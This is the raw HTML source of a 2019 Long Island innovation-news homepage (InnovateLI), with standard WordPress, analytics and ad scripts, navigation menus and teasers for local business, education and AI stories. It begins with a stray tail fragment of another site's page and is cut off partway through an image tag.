src='https://happiercamper.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> </body> </html>
0
<!DOCTYPE html> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <title>InnovateLI — Inside Long Island&#039;s Innovation Economy</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.innovateli.com/wp/xmlrpc.php" /> <!-- This site is optimized with the Yoast SEO plugin v9.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="News and opinion for and about the region’s next economy. Innovators of every size and stripe welcome."/> <link rel="canonical" href="http://www.innovateli.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="InnovateLI — Inside Long Island&#039;s Innovation Economy" /> <meta property="og:description" content="News and opinion for and about the region’s next economy. Innovators of every size and stripe welcome." /> <meta property="og:url" content="http://www.innovateli.com/" /> <meta property="og:site_name" content="Innovate Long Island" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/www.innovateli.com\/","name":"Innovate Long Island","potentialAction":{"@type":"SearchAction","target":"http:\/\/www.innovateli.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"http:\/\/www.innovateli.com\/","sameAs":[],"@id":"http:\/\/www.innovateli.com\/#organization","name":"InnovateLI","logo":"http:\/\/www.innovateli.com\/wp\/wp-content\/uploads\/2015\/04\/InnovateLogoTagline2.png"}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Innovate Long Island &raquo; Feed" href="http://www.innovateli.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Innovate Long Island &raquo; Comments Feed" href="http://www.innovateli.com/comments/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-61949926-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-61949926-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.innovateli.com\/wp\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <!-- managing ads with Advanced Ads – https://wpadvancedads.com/ --><script> advanced_ads_ready=function(){var fns=[],listener,doc=typeof document==="object"&&document,hack=doc&&doc.documentElement.doScroll,domContentLoaded="DOMContentLoaded",loaded=doc&&(hack?/^loaded|^c/:/^loaded|^i|^c/).test(doc.readyState);if(!loaded&&doc){listener=function(){doc.removeEventListener(domContentLoaded,listener);window.removeEventListener("load",listener);loaded=1;while(listener=fns.shift())listener()};doc.addEventListener(domContentLoaded,listener);window.addEventListener("load",listener)}return function(fn){loaded?setTimeout(fn,0):fns.push(fn)}}(); </script><style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='contact-form-7-css' href='http://www.innovateli.com/wp/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='feedzy-rss-feeds-css' href='http://www.innovateli.com/wp/wp-content/plugins/feedzy-rss-feeds/css/feedzy-rss-feeds.css?ver=3.3.1' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css' href='http://www.innovateli.com/wp/wp-content/themes/mh_newsdesk/style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='child-style-css' href='http://www.innovateli.com/wp/wp-content/themes/mh_newsdesk-child/style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='mh-style-css' href='http://www.innovateli.com/wp/wp-content/themes/mh_newsdesk-child/style.css?ver=1.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='mh-font-awesome-css' href='//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mh-google-fonts-css' href='//fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700|Oswald:300,400,400italic,600,700' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"http:\/\/www.innovateli.com","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.10'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/constant-contact-api/lib/form-designer/js/cc-widget.js?ver=4.9.10'></script> <link rel='https://api.w.org/' href='http://www.innovateli.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.innovateli.com/wp/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.innovateli.com/wp/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='http://www.innovateli.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.innovateli.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.innovateli.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.innovateli.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.innovateli.com%2F&#038;format=xml" /> <style type="text/css"> #logo-slider img { box-shadow: none !important; margin: 0 18px; } .lsp_main_slider { background-color: #FFFFFF; width: 778px; height: 90px; padding: 8px; position: relative; margin-bottom: 24px; } .lsp_slider_controls { position: relative; top: 50%; margin-top: -20px; } .lsp_next_btn { background: url() no-repeat center; float: right; width: 40px; height: 40px; display: inline-block; text-indent: -9000px; cursor: pointer; } .lsp_prev_btn { background: url() no-repeat center; float: float; width: 40px; height: 40px; display: inline-block; text-indent: -9000px; cursor: pointer; } .lsp_slider_img { height: auto; margin-top: -45px; overflow: hidden; position: absolute; top: 50%; left: 6%; text-align: center; width: 688px; /* margin-left: -*//*px;*/ } #logo-slider { height: auto; margin-top: -45px; overflow: hidden; position: absolute; top: 50%; left: 6%; text-align: center; width: 688px; /* margin-left: -*//*px;*/ } .lsp_img_div { width: 100%; height: auto; } /* Visibilties */ .visible_phone { visibility: hidden; display: none; } .visible_desktop { visibility: visible; } /* ============================= */ /* ! Layout for phone version */ /* ============================= */ /*Rsponsive layout 1024*/ @media screen and (min-width: 801px) and (max-width: 1024px) { .visible_phone { visibility: visible; display: inherit; } .visible_desktop { visibility: hidden; display: none; } .lsp_main_slider { background-color: #FFFFFF; height: 90px; padding: 8px; position: relative; width: 100%; margin-bottom: 24px; } .lsp_slider_img { height: auto; margin-left: -334px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 668px; text-align: center; } #logo-slider { height: auto; margin-left: -334px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 668px; text-align: center; } } /*Rsponsive layout 768*/ @media screen and (min-width: 641px) and (max-width: 800px) { .visible_phone { visibility: visible; display: inherit; } .visible_desktop { visibility: hidden; display: none; } .lsp_main_slider { background-color: #FFFFFF; height: 90px; padding: 8px; position: relative; width: 100%; margin-bottom: 24px; } .lsp_slider_img { height: auto; margin-left: -256px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 512px; text-align: center; } #logo-slider { height: auto; margin-left: -256px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 512px; text-align: center; } } /*Rsponsive layout 640*/ @media screen and (min-width: 481px) and (max-width: 640px) { .visible_phone { visibility: visible; display: inherit; } .visible_desktop { visibility: hidden; display: none; } .lsp_main_slider { background-color: #FFFFFF; height: 90px; padding: 8px; position: relative; width: 100%; margin-bottom: 24px; } .lsp_slider_img { height: auto; margin-left: -176px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 346px; text-align: center; } #logo-slider { height: auto; margin-left: -176px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 346px; text-align: center; } } /*Rsponsive layout 480*/ @media screen and (min-width: 320px) and (max-width: 480px) { .visible_phone { visibility: visible; display: inherit; } .visible_desktop { visibility: hidden; display: none; } .lsp_main_slider { background-color: #FFFFFF; height: 90px; padding: 8px; position: relative; width: 100%; margin-bottom: 24px; } .lsp_slider_img { height: auto; margin-left: -91px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 185px; text-align: center; } #logo-slider { height: auto; margin-left: -91px; margin-top: -65px; overflow: hidden; position: absolute; top: 50%; left: 50%; width: 185px; text-align: center; } } </style> <style type="text/css"> .widget-title, .pagination a.page-numbers:hover, .dots:hover, .pagination a:hover .pagelink, .comment-section-title { background: #f9f9f9; } .commentlist .depth-1, .commentlist .bypostauthor .avatar { border-color: #f9f9f9; } </style> <link rel="shortcut icon" href="http://www.innovateli.com/wp/wp-content/uploads/2015/04/bulb.png"> <!--[if lt IE 9]> <script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script> <![endif]--> <style type="text/css" id="wp-custom-css"> .lsp_main_slider { overflow: hidden; } .cycle-slide { opacity: 0; } </style> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-61949926-1', 'auto'); ga('send', 'pageview'); </script> </head> <body class="home page-template page-template-template-front page-template-template-front-php page page-id-106 mh-right-sb"> <div id="mh-wrapper"> <header class="mh-header"> <div class="header-wrap clearfix"> <div class="mh-col mh-1-3 header-logo"> <a href="http://www.innovateli.com/" title="Innovate Long Island" rel="home"> <div class="logo-wrap" role="banner"> <img src="http://www.innovateli.com/wp/wp-content/uploads/2015/04/InnovateLogoTagline2.png" height="113" width="300" alt="Innovate Long Island" /> </div> </a> </div> <aside class="mh-col mh-2-3"><div class="header-ad"> <div class="lsp_main_slider" style="height: 90px"> <div id="logo-slider"> <div class="cycle-slideshow" id="lsp_slideshow_1" data-cycle-fx="fade" data-cycle-timeout="3000" data-cycle-carousel-visible="3" data-cycle-next="#lsp_next_btn_1" data-cycle-prev="#lsp_prev_btn_1" data-cycle-speed="800" data-cycle-slides="> div" > </div> </div> </div> </div></aside> </div> <div class="header-menu clearfix"> <nav class="main-nav clearfix"> <div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-107" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-106 current_page_item menu-item-107"><a href="http://www.innovateli.com/">Home</a></li> <li id="menu-item-120" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-120"><a href="http://www.innovateli.com/category/news/">News</a> <ul class="sub-menu"> <li id="menu-item-121" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-121"><a href="http://www.innovateli.com/category/news/biotech/">Biotech</a></li> <li id="menu-item-122" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-122"><a href="http://www.innovateli.com/category/news/clean-energy/">Clean Energy</a></li> <li id="menu-item-627" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-627"><a href="http://www.innovateli.com/category/news/economic-development/">Economic Development</a></li> <li id="menu-item-123" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-123"><a href="http://www.innovateli.com/category/news/education/">Education</a></li> <li id="menu-item-132" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-132"><a href="http://www.innovateli.com/category/news/finance/">Finance</a></li> <li id="menu-item-1275" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1275"><a href="http://www.innovateli.com/category/news/food-tech/">Food Tech</a></li> <li id="menu-item-126" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126"><a href="http://www.innovateli.com/category/news/health/">Health</a></li> <li id="menu-item-127" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-127"><a href="http://www.innovateli.com/category/news/information-technology/">IT</a></li> <li id="menu-item-130" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-130"><a href="http://www.innovateli.com/category/news/startups/">Startups</a></li> </ul> </li> <li id="menu-item-25119" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25119"><a href="http://www.innovateli.com/category/voices/">Voices</a> <ul class="sub-menu"> <li id="menu-item-25120" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-25120"><a href="http://www.innovateli.com/the-shutdown-and-you-a-long-islanders-guide/">The shutdown and you: A Long Islander&#8217;s guide</a></li> </ul> </li> <li id="menu-item-15" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15"><a href="http://www.innovateli.com/category/opinion/">Opinion</a></li> <li id="menu-item-116" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-116"><a href="http://www.innovateli.com/category/news/biotech/">Biotech</a></li> <li id="menu-item-118" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-118"><a href="http://www.innovateli.com/category/news/information-technology/">IT</a></li> <li id="menu-item-1276" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1276"><a href="http://www.innovateli.com/category/news/startups/">Startups</a></li> <li id="menu-item-117" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-117"><a href="http://www.innovateli.com/category/news/clean-energy/">Clean Energy</a></li> <li id="menu-item-1272" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1272"><a href="http://www.innovateli.com/category/newsletters/">Newsletters</a></li> <li id="menu-item-10991" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-10991"><a href="http://www.innovateli.com/2017-innovator-year-awards/">Awards</a> <ul class="sub-menu"> <li id="menu-item-26806" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26806"><a href="http://www.innovateli.com/2019-innovator-of-the-year-awards/">2019 Innovator of the Year Awards</a></li> <li id="menu-item-20363" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20363"><a href="http://www.innovateli.com/2018-innovator-year-awards/">2018 Innovator of the Year Awards</a></li> <li id="menu-item-25036" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-25036"><a href="http://www.innovateli.com/2018-innovator-awards-video/">2018 Innovator Awards Video</a></li> <li id="menu-item-10994" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10994"><a href="http://www.innovateli.com/2017-innovator-year-awards/">2017 Innovator Awardees</a></li> <li id="menu-item-10993" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10993"><a href="http://www.innovateli.com/innovator-of-the-year-awards/">2015 Innovator Awardees</a></li> </ul> </li> </ul></div> </nav> <div class="header-sub clearfix"> <section id="ticker" class="news-ticker mh-col mh-2-3 clearfix"> <span class="ticker-title">Hot Topics</span> <ul class="ticker-content"> <li class="ticker-item"> <a class="ticker-item-link" href="http://www.innovateli.com/location-plays-big-as-bridgeworks-dropdesk-expand/" title="Location plays big as Bridgeworks, DropDesk expand"> <span class="ticker-item-date">May 15, 2019</span> <span class="ticker-item-separator">|</span> <span class="ticker-item-title">Location plays big as Bridgeworks, DropDesk expand</span> </a> </li> <li class="ticker-item"> <a class="ticker-item-link" href="http://www.innovateli.com/at-new-sbu-hub-artificial-intelligence-is-the-real-deal/" title="At new SBU hub, artificial intelligence is the real deal"> <span class="ticker-item-date">May 15, 2019</span> <span class="ticker-item-separator">|</span> <span class="ticker-item-title">At new SBU hub, artificial intelligence is the real deal</span> </a> </li> <li class="ticker-item"> <a class="ticker-item-link" href="http://www.innovateli.com/no-405-on-farmingdale-states-new-feeder-stony-brooks-super-switch-and-adelphis-major-minor-upgrade/" title="No. 405: On Farmingdale State’s new feeder, Stony Brook’s super switch and Adelphi’s major minor upgrade"> <span class="ticker-item-date">May 15, 2019</span> <span class="ticker-item-separator">|</span> <span class="ticker-item-title">No. 405: On Farmingdale State’s new feeder, Stony Brook’s super switch and Adelphi’s major minor upgrade</span> </a> </li> <li class="ticker-item"> <a class="ticker-item-link" href="http://www.innovateli.com/joint-admissions-effort-unites-ncc-farmingdale-state/" title="Joint admissions effort unites NCC, Farmingdale State"> <span class="ticker-item-date">May 14, 2019</span> <span class="ticker-item-separator">|</span> <span class="ticker-item-title">Joint admissions effort unites NCC, Farmingdale State</span> </a> </li> <li class="ticker-item"> <a class="ticker-item-link" href="http://www.innovateli.com/as-apollo-anniversary-approaches-mission-time-at-coa/" title="As Apollo anniversary nears, mission time at CoA"> <span class="ticker-item-date">May 13, 2019</span> <span class="ticker-item-separator">|</span> <span class="ticker-item-title">As Apollo anniversary nears, mission time at CoA</span> </a> </li> </ul> </section> <aside class="mh-col mh-1-3 header-search"> <form role="search" method="get" class="search-form" action="http://www.innovateli.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form> </aside> </div> </div> </header> <div class="home mh-section mh-group"> <div id="main-content" class="home-columns"> <div class="sb-widget"><p><a href="https://www.northwell.edu/"><img class="alignleft size-full wp-image-8427" src="http://www.innovateli.com/wp/wp-content/uploads/2016/10/Innovate-LI_Northwell-Health-Banner-ad_728x90732.jpg" alt="innovate-li_northwell-health-banner-ad_728x90732" width="728" height="90" srcset="http://www.innovateli.com/wp/wp-content/uploads/2016/10/Innovate-LI_Northwell-Health-Banner-ad_728x90732.jpg 728w, http://www.innovateli.com/wp/wp-content/uploads/2016/10/Innovate-LI_Northwell-Health-Banner-ad_728x90732-300x37.jpg 300w" sizes="(max-width: 728px) 100vw, 728px" /></a></p> </div><div class="sb-widget"> <div class="mh-fp-large-widget clearfix"><article class="content-lead post-27809 post type-post status-publish format-standard has-post-thumbnail hentry category-economic-development tag-bridgeworks tag-co-working-space tag-dropdesk-llc tag-graham-beck tag-lead tag-phillip-beck tag-planet-payment"> <div class="content-thumb content-lead-thumb"> <a href="http://www.innovateli.com/location-plays-big-as-bridgeworks-dropdesk-expand/" title="Location plays big as Bridgeworks, DropDesk expand"><img width="777" height="437" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Exec-conference-2.jpg 900w" sizes="(max-width: 777px) 100vw, 777px" /></a> </div> <p class="entry-meta"> <span class="entry-meta-cats"><a href="http://www.innovateli.com/category/news/economic-development/" rel="category tag">Economic Development</a></span> <span class="entry-meta-date updated">May 15, 2019</span> </p> <h3 class="content-lead-title"><a href="http://www.innovateli.com/location-plays-big-as-bridgeworks-dropdesk-expand/" title="Location plays big as Bridgeworks, DropDesk expand" rel="bookmark">Location plays big as Bridgeworks, DropDesk expand</a></h3> <div class="content-lead-excerpt"> <p>By GREGORY ZELLER // Consider it ridesharing on the road to professional development. That’s the angle founder Graham Beck is taking at Bridgeworks, the Long Beach co-working community that’s advancing nicely in Beck’s self-appointed mission to create a local business-incubation system – and then replicate it elsewhere. As co-working spaces go, Bridgeworks is a busy one: networking events, marketing help, printing services, plenty to eat and drink and a host of other business-building benefits especially&#8230;</p> <a class="button" href="http://www.innovateli.com/location-plays-big-as-bridgeworks-dropdesk-expand/"> <span>Read More</span> </a> </div> </article><hr class="mh-separator"> </div></div><div class="sb-widget"> <div class="mh-fp-grid-widget clearfix"><div class="mh-section mh-group"> <article class="mh-col mh-1-4 content-grid post-27798 post type-post status-publish format-standard has-post-thumbnail hentry category-artificial-intelligence tag-artificial-intelligence tag-bloomberg tag-brookhaven-national-laboratory tag-fitos-sotiropoulos tag-gideon-mann tag-institute-for-ai-driven-discovery-and-innovation tag-kristina-johnson tag-news tag-samuel-stanley-jr tag-sbu-college-of-engineering-and-applied-sciences tag-sbu-school-of-marine-and-atmospheric-sciences tag-steven-skiena tag-stony-brook-university tag-suny-empire-innovation-program tag-u-s-department-of-energy"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/at-new-sbu-hub-artificial-intelligence-is-the-real-deal/" title="At new SBU hub, artificial intelligence is the real deal"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/AI-2.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/artificial-intelligence/" rel="category tag">Artificial Intelligence</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/at-new-sbu-hub-artificial-intelligence-is-the-real-deal/" title="At new SBU hub, artificial intelligence is the real deal" rel="bookmark">At new SBU hub, artificial intelligence is the real deal</a></h3> </article> <hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-27774 post type-post status-publish format-standard has-post-thumbnail hentry category-education tag-adelphi-university tag-farmingdale-state-college tag-hofstra-university tag-hubert-keen tag-john-nader tag-nassau-community-college tag-news tag-nyit tag-onondaga-community-college tag-stony-brook-university tag-suffolk-county-community-college tag-suny-college-of-environmental-science-and-forestry tag-suny-old-westbury"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/joint-admissions-effort-unites-ncc-farmingdale-state/" title="Joint admissions effort unites NCC, Farmingdale State"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-260x146.jpg 260w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-373x210.jpg 373w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2-120x67.jpg 120w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/Joint-admissions-2.jpg 900w" sizes="(max-width: 180px) 100vw, 180px" /></a> </div> <p class="entry-meta"><span><a href="http://www.innovateli.com/category/news/education/" rel="category tag">Education</a></span></p> <h3 class="content-grid-title"><a href="http://www.innovateli.com/joint-admissions-effort-unites-ncc-farmingdale-state/" title="Joint admissions effort unites NCC, Farmingdale State" rel="bookmark">Joint admissions effort unites NCC, Farmingdale State</a></h3> </article> <hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-27766 post type-post status-publish format-standard has-post-thumbnail hentry category-space tag-andrew-parton tag-apollo-moon-landing tag-buzz-aldrin tag-countdown-to-apollo-at-50 tag-cradle-of-aviation-museum tag-grumman tag-john-f-kennedy-space-center tag-michael-collins tag-nasa tag-national-air-and-space-museum tag-neil-armstrong tag-news"> <div class="content-thumb content-grid-thumb"> <a href="http://www.innovateli.com/as-apollo-anniversary-approaches-mission-time-at-coa/" title="As Apollo anniversary nears, mission time at CoA"><img width="180" height="101" src="http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-180x101.jpg 180w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-300x169.jpg 300w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-768x432.jpg 768w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-777x437.jpg 777w, http://www.innovateli.com/wp/wp-content/uploads/2019/05/moon-man-2-260x146.jpg 260w, 